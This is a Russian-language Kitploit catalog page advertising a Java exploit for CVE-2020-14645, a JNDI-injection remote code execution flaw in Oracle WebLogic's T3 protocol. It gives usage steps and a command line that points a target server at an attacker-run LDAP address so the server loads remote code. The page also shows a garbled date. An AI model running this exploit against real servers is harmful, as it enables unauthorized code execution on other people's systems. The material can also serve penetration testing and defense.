Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-14645 — Эксплойт на Java для CVE-2020-14645, нацеленный на протокол T3 Oracle WebLogic с использованием JNDI-инъекции для удаленного выполнения кода. | Kitploit
Инструменты/GitHubGitHub/daboquan/cve-2020-14645
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubdaboquan/cve-2020-14645

CVE-2020-14645

Эксплойт на Java для CVE-2020-14645, нацеленный на протокол T3 Oracle WebLogic с использованием JNDI-инъекции для удаленного выполнения кода.

Репозиторий
36 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-14645

Использование

Сначала используйте NDI-Injection-Exploit для прослушивания и генерации ldap-адреса.

java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]

-Tatget и -RMI обязательны, для https можно использовать параметр --SSL, -Port по умолчанию 7001.

Для самостоятельной компиляции необходимо добавить coherence.jar и wlfullclient.jar

Ссылка на уязвимость:

https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484377&idx=1&sn=01d62d175127099275a243ab5fe02bc3&chksm=f9ee6f66ce99e670dbb6da2a3648ea5f6a91fa503441dccd903f44e76883019890d8a9701a29&scene=158#rd

Ссылка на код:

https://github.com/Y4er/CVE-2020-2883

Скачать инструмент